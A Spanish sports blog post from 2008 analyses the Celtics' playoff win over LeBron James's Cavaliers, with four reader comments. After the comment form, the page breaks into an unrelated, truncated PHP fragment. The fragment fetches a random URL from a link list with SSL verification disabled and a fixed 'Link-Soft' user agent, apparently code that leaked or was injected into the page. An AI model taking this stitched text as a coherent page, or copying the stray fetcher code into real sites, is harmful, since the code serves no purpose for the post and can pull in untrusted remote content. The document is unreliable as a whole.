La noche que Boston se disfrazó de Lebron… para vencerle (CLE 92 – BOS 97)

19 de May de 2008 por TheDeerHunter

Cuando Ray Allen caminaba hacia la línea de tiros libres para ganar el partido, a medio minuto del final de lo que había sido un auténtico infierno, su rostro no reflejaba ni el alivio ni la alegría que supone haber logrado clasificarse a toda una final de conferencia. Era un rostro de decepción, de tristeza, de impotencia por el desastre de partido que particularmente había hecho. En su cabeza, podemos imaginar, hervían ideas relativas al Big Three y el papel que le correspondía en el mismo. Las etiquetas de ese estilo empiezan como algo ingenioso y divertido, pero pueden terminar devorando cruelmente a sus protagonistas. El proyecto de Boston fue diseñado para sustentarse en tres pilares fundamentales, pero ahora mismo a duras penas se sostiene en dos de ellos y en una defensa a muerte, digna de los 300. No debería ser mal bagaje, aún así, y en cierto modo no lo ha sido, porque los resultados continúan bendiciéndoles. Parece, sin embargo, que con el talento que se les presupone, han sufrido más que nadie contra equipos a priori siempre inferiores y que cada vez les cuesta más defender su condición de favoritos.

Anoche, fue Paul Pierce, el “más grande perdedor” de la historia de la franquicia, el único con hambre, arrestos y acierto suficiente para tirar del carro, mientras el resto se dejaba la vida en defensa y le observaban aliviados en ataque como espectadores privilegiados de una actuación memorable. El Elegido de Boston. La mutación del equipo fue completa, el Big Three se convirtió en “The Chosen One” y se dejó en las únicas manos que no temblaban, la suerte de “Hacer historia” o “Ser historia” como rezaba el precioso anuncio de Gatorade.

En frente, los Cavaliers a lo suyo. Se mantuvieron hasta el final agazapados de la mano del de siempre y con una sola jugada con muchas variantes: el balón a Lebron como fuera. A partir de ahí, bote tras bote y un bloqueo, que le permitía forzar la penetración o buscar el triple, con alguna que otra ocasión que se doblaba el balón en un pase definitivo que buscaba la asistencia. Uno jugando y cuatro mirando, abiertos, esperando la remota posibilidad del pase para volver corriendo a romperse la cara en la defensa… y otra vez más volver a empezar. Lo alucinante es que a pesar de todo Lebron ha vuelto a estar cerca de conseguirlo. De vencer a los primeros jugando sólo. Muchísimo más cerca de lo que parece y los Celtics lo saben. Se ha mantenido en la pomada hasta el último momento del último partido de una eliminatoria que a priori tenía perdida desde el principio. Igual que el año pasado, pero concluida de forma diferente. Da miedo pensar qué podría lograr de tener a alguien capaz a su lado. Uno que es capaz de arrasar defendiéndole cinco. Pero tampoco podemos imaginar cómo podría haber alguien más dentro de ese modelo, con un único balón en juego.

Ahora Detroit espera a Boston con los cuchillos afilados y las piernas descansadas. Como equipo es infinitamente mejor que los que han dejado atrás. Hasta ahora lo han logrado, se han adaptado a las circunstancias, han controlado su ansiedad y han prevalecido. Pronto sabremos si son capaces de hacer lo mismo contra Los Pistons.

Comenta

4 comentarios a esta entrada

  1. Gallis dice:
    #1

    Pues el partido fue una mierda, pero el duelo Pierce- Lebron fue memorable…

    Y me repito cual ajo…Boston debería empezar a pensar en ganar un partido fuera de casa.

      Citar

  2. TheDeerHunter dice:
    #2

    Decía Daimiel que ningún equipo que haya perdido los primeros 5 fuera ha ganado nunca nada.

    Qué miedo me da cuando alguien saca a relucir esas estadísticas…

      Citar

  3. telekoman dice:
    #3

    Pues aquí les esperamos, con el cuchillo entre los dientes. Si los Celtics siguen en esta dinámica yo creo que Detroit les puede ganar alguno de los partidos en el Garden. También es posible que espabilen, recuperen a Allen y pasen por encima de Detroit, pero sinceramente no creo. Más que nada por que no les ha dado tiempo a descansar absolutamente nada.

    La verdad es que, pase quien pase en el duelo Hornets – Spurs, quedan en liza los más fuertes de este año sin discusión alguna. Tenemos unas Finales de Conferencia de lujazo.

      Citar

  4. TheDeerHunter dice:
    #4

    Mi experiencia dice que, con excepciones, la tendencia de juego que los equipos muestran es la que les lleva al final al éxito y al fracaso.

    Detroit ha estado muy bien toda la temporada, pero ha subido un escalón en estos playoffs desde que Philadelphia les mojó la oreja en primera ronda. Boston está jugando horrible y cuando un jugador como Ray Allen entra en esa dinámica es muy difícil cambiarla. Es el pez que se muerde la cola y ataca directamente a su amor propio. Muy fuerte tiene que ser para cambiar la dinámica… y a estas alturas de temporada la cabeza pesa demasiado y el cuerpo más todavía. Lo veo casi imposible y sin él Celtics me parece inferior a Detroit. Rondo tres cuartas partes de lo mismo… y sólo quedan dos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>